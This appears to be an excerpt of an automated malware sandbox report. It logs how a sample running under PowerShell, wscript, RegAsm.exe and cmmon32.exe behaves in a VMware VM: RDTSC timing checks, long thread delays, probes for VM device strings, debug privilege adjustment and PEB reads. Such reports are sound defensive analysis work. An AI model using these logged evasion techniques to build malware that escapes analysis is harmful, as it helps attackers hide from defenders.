Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408A34 second address: 0000000000408A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408DCE second address: 0000000000408DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003208A34 second address: 0000000003208A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003208DCE second address: 0000000003208DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560 Thread sleep count: 4119 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3532 Thread sleep count: 3084 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep count: 4983 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep count: 4229 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340 Thread sleep count: 78 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252 Thread sleep time: -24903104499507879s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816 Thread sleep count: 3828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep count: 3230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408D00 rdtsc 9_2_00408D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2039 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4119 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3084 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3920 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4368 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3925 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 384 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1367 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4983 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4229 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3230
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 8.5 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 5.2 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: explorer.exe, 0000000A.00000003.563410096.0000000007EFB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.538181499.0000000006900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000006.00000002.503512245.0000012FE01C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000A.00000000.518268066.0000000007F91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408D00 rdtsc 9_2_00408D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7AAB0 mov eax, dword ptr fs:[00000030h] 9_2_02B7AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9FAB0 mov eax, dword ptr fs:[00000030h] 9_2_02B9FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9D294 mov eax, dword ptr fs:[00000030h] 9_2_02B9D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92AE4 mov eax, dword ptr fs:[00000030h] 9_2_02B92AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92ACB mov eax, dword ptr fs:[00000030h] 9_2_02B92ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA4A2C mov eax, dword ptr fs:[00000030h] 9_2_02BA4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2EA55 mov eax, dword ptr fs:[00000030h] 9_2_02C2EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6AA16 mov eax, dword ptr fs:[00000030h] 9_2_02B6AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1B260 mov eax, dword ptr fs:[00000030h] 9_2_02C1B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38A62 mov eax, dword ptr fs:[00000030h] 9_2_02C38A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B83A1C mov eax, dword ptr fs:[00000030h] 9_2_02B83A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov ecx, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B78A0A mov eax, dword ptr fs:[00000030h] 9_2_02B78A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA927A mov eax, dword ptr fs:[00000030h] 9_2_02BA927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AA16 mov eax, dword ptr fs:[00000030h] 9_2_02C2AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BF4257 mov eax, dword ptr fs:[00000030h] 9_2_02BF4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h] 9_2_02B69240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h] 9_2_02B94BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9B390 mov eax, dword ptr fs:[00000030h] 9_2_02B9B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92397 mov eax, dword ptr fs:[00000030h] 9_2_02B92397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B71B8F mov eax, dword ptr fs:[00000030h] 9_2_02B71B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1D380 mov ecx, dword ptr fs:[00000030h] 9_2_02C1D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2138A mov eax, dword ptr fs:[00000030h] 9_2_02C2138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8DBE9 mov eax, dword ptr fs:[00000030h] 9_2_02B8DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C35BA5 mov eax, dword ptr fs:[00000030h] 9_2_02C35BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE53CA mov eax, dword ptr fs:[00000030h] 9_2_02BE53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38B58 mov eax, dword ptr fs:[00000030h] 9_2_02C38B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B93B7A mov eax, dword ptr fs:[00000030h] 9_2_02B93B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6DB60 mov ecx, dword ptr fs:[00000030h] 9_2_02B6DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2131B mov eax, dword ptr fs:[00000030h] 9_2_02C2131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6F358 mov eax, dword ptr fs:[00000030h] 9_2_02B6F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6DB40 mov eax, dword ptr fs:[00000030h] 9_2_02B6DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9F0BF mov ecx, dword ptr fs:[00000030h] 9_2_02B9F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9F0BF mov eax, dword ptr fs:[00000030h] 9_2_02B9F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA90AF mov eax, dword ptr fs:[00000030h] 9_2_02BA90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69080 mov eax, dword ptr fs:[00000030h] 9_2_02B69080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE3884 mov eax, dword ptr fs:[00000030h] 9_2_02BE3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h] 9_2_02B640E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B658EC mov eax, dword ptr fs:[00000030h] 9_2_02B658EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h] 9_2_02B7B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h] 9_2_02BE7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C22073 mov eax, dword ptr fs:[00000030h] 9_2_02C22073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31074 mov eax, dword ptr fs:[00000030h] 9_2_02C31074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C34015 mov eax, dword ptr fs:[00000030h] 9_2_02C34015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B80050 mov eax, dword ptr fs:[00000030h] 9_2_02B80050
